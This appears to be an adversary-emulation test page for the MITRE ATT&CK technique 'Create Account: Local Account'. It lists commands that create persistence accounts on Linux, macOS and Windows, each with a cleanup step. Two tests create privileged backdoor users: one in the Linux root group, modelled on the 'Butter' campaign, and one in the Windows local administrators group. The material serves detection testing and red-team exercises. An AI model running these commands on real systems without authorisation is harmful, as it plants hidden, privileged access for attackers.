Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, thenet user /addcommand can be used to create a local account.Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Create a user via useradd
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | evil_user |
useradd -M -N -r -s /bin/bash -c evil_account #{username}userdel #{username}Creates a user on a MacOS system with dscl
Supported Platforms: macOS
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | evil_user |
| realname | 'realname' to record when creating the user | String | Evil Account |
dscl . -create /Users/#{username}
dscl . -create /Users/#{username} UserShell /bin/zsh
dscl . -create /Users/#{username} RealName "#{realname}"
dscl . -create /Users/#{username} UniqueID "1010"
dscl . -create /Users/#{username} PrimaryGroupID 80
dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}dscl . -delete /Users/#{username}Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD"
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | T1136.001_CMD |
| password | Password of the user to create | String | T1136.001_CMD! |
net user /add "#{username}" "#{password}"net user /del "#{username}" >nul 2>&1Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell"
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | T1136.001_PowerShell |
New-LocalUser -Name "#{username}" -NoPasswordRemove-LocalUser -Name "#{username}" -ErrorAction IgnoreCreates a new user in Linux and adds the user to the root group. This technique was used by adversaries during the Butter attack campaign.
Supported Platforms: Linux
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | butter |
| password | Password of the user to create | String | BetterWithButter |
useradd -g 0 -M -d /root -s /bin/bash #{username}
if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi;userdel #{username}Creates a new admin user in a command prompt.
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| username | Username of the user to create | String | T1136.001_Admin |
| password | Password of the user to create | String | T1136_pass |
net user /add "#{username}" "#{password}"
net localgroup administrators "#{username}" /addnet user /del "#{username}" >nul 2>&1